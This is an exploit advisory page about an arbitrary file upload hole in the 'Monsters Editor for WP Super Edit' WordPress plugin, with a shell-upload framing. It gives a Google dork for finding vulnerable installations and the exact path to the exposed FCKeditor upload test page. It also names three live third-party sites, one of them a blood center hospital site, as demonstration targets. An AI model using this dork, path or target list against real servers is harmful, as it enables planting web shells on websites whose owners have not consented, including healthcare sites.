WordPress Monsters Editor Shell Upload

2012.08.23
Credit: Crim3R
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264
Dork: inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit/

# Exploit Title: Wordpress Monsters Editor for WP Super Edit Arbitrary File Upload Vulnerability # Google Dork: inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit/ # Date: 08/22/2012 # Author: Crim3R # download Link : http://downloads.wordpress.org/plugin/monsters-editor-10-for-wp-super-edit.zip # Tested on: all ================================== D3m0: http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html http://surgical.healthase.com/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html ===============Crim3R@Att.Net========= $Home = %00 thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir

References:

http://downloads.wordpress.org/plugin/monsters-editor-10-for-wp-super-edit.zip


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top